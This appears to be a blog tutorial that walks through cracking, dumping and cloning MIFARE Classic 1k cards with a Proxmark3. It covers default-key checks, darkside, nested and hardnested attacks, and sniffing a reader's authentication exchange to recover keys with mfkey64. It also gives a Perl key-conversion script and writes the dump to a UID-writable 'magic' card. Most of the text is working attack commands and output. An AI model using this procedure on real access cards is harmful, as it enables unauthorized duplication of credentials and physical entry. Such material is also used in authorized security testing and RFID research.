proxmark3 mifare classic 1k weak / hard

Quick summary of operations to crack/dump/duplicate a Mifare classic 1k with the proxmark3.

The darkside attack (for weak mifare) can be processed with a low cost hardware like the ARC122U, with mfcuk/mfoc over the libnfc.

Nowadays, this attack is not covering a lot of Mifare classic card anymore. The Proxmark3, with a price under $100, is the best choice.
For the Proxmark3, the weak PRNG method is easy to find but the sniff/hardnested method for hard PRNG is more tricky.

You have the whole process here.

Hardware
Proxmark3 original or clone.
Chinese/Magic cards with block 0 / uid writeable.
… search on well-known China e-commerce/marketplace websites.
Software
https://github.com/iceman1001/proxmark3/releases

Infos

./proxmark3 /dev/ttyACM[01]

pm3> hf 14a reader

1) First of all – try generic keys…

like this somekeys.txt, took from Mifare Classic Tool (android)

pm3> hf mf chk *1 A 1234567890ab somekeys.txt

If you are lucky, you have a key… need to check now against B.

pm3> hf mf chk *1 ? KEY_FOUND

If you don’t have B, jump to the “Crack others keys” of each section 2.
If you have B, you have all the keys A/B and you can jump to section 3.

2*) Method for weak

pm3> hf mf mifare

pm3> hf mf chk 0 A KEY_FOUND    (Check Found Key On Block 0 A)

Crack others keys

pm3> hf mf nested 1 0 A KEY_FOUND d   (Crack others keys)

2*) Method for hard

Sniff
The fun part… you have to fix the card to the proxmark3 (duct tape) connected to a laptop and set the proxmark3 in sniff mode.
If you have a y-usb cable, you can also power the proxmark3 with an usb power pack and connect it back to your desktop to get the traces.
The best way to sniff all the transaction is to put the proxmark3 between the card and the reader.
Push it against the reader, well aligned… and repeat it 3-4 times to get at least one good sniffed transaction.

pm3> hf 14a sniff

 --- trigger the reader with the card (proxmark in between)
 --- remove and repeat to get many traces...

 --- push the proxmark button to stop

 --- read the traces
pm3> hf 14a list

Mifare Classic protocol

Trace example

561882:  1 :     26
    64:  2 : TAG 04  00
 10217:  2 :     93  20
    64:  5 : TAG [[ 9c  59  9b  32 ]]  6c                       UID
 12313:  9 :     93  70  9c  59  9b  32  6c  6b  30
    64:  3 : TAG 08  b6  dd
923318:  4 :     60  ((EC))  f5  7b                             AUTH Block 0
   112:  4 : TAG [[ 82  a4  16  6c ]]                           Nonce Tag (NT)
  6985:  8 :     [[ a1  e4! 58  ce! ]] [[ 6e  ea! 41  e0! ]]    NR , AR
    64:  4 : TAG [[ 5c! ad  f4  39! ]]                          AT
811513:  4 :     8e  0e! 5d! b9                                 AUTH Block 0 N
   112:  4 : TAG 5a! 92  0d! 85!                                Nonce Tag (NT)
  6946:  8 :     98! d7  6b! 77  d6  c6  e8  70                 NR , AR
    64:  4 : TAG ca  7e! 0b! 63!                                AT
670868:  4 :     [[ 3e! 70  9c! 8a ]]
   112:  4 : TAG 36! 41  24! 79
  9505:  8 :     1b! 8c  3a! 48! 83  5a  4a! 27
    64:  4 : TAG 40! 6a! 99! 4b
905612:  4 :     c9  7c  64! 13!       !crc
   112:  4 : TAG b5! ab! 1d! 2b
  6936:  8 :     7e! d2  5c! ca! 4b! 50! 88! c4        !crc
    64:  4 : TAG bf  dd  01  be!
987853:  4 :     56  98  49  d6!       !crc

 ### last block e709c8a is not mandatory
./tools/mfkey/mfkey64 9c599b32 82a4166c a1e458ce 6eea41e0 5cadf439 e709c8a

Check key against A/B

pm3> hf mf chk *1 ? KEY_FOUND
... 

You can possibly bypass next step if the key is the same on A/B.

Crack others keys
replace 60 with the numeric value of the Hexadecimal between double parenthesis in the example – ours is ‘EC’.

pm3> hf mf hardnested 0 A KEY_FOUND 60 B s w

pm3> sc r hard_autopwn -k KEY_FOUND -a

Keys to dumpkeys.bin (perl):

my $v = <<EOF;
  |000|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |          
  |001|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |
  ...          
  |015|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |    
EOF
my @a;
while ($v =~ /.*?([0-9a-f]{12})/is) { push @a, $1; $v = $'; }
open FH, ">dumpkeys.bin";
binmode FH;
foreach my $odd (0,1) {
  for (my $i=$odd;$i<=$#a;$i+=2) {
    my $s = $a[$i];
    while (length($s)) {
      print FH pack('C', oct('0x'.substr($s,0,2)));
      $s = substr($s, 2);
    }
  }
}
close FH;

Run it and you get a proper dumpkeys.bin to run 'hf mf dump' which relies on it.

vim hex2dumpkeys.pl
 --- put the full keys table in it.
perl hex2dumpkeys.pl

3) From keys to write

Verify:

xxd dumpkeys.bin

Dump the card to dumpdata.bin

pm3> hf mf dump 1

Prepare .eml

python pm3_mfd2eml.py dumpdata.bin dumpdata.eml

Load in blank Magic/Chinese card

pm3> hf mf cload dumpdata

Leave a Reply

Your email address will not be published. Required fields are marked *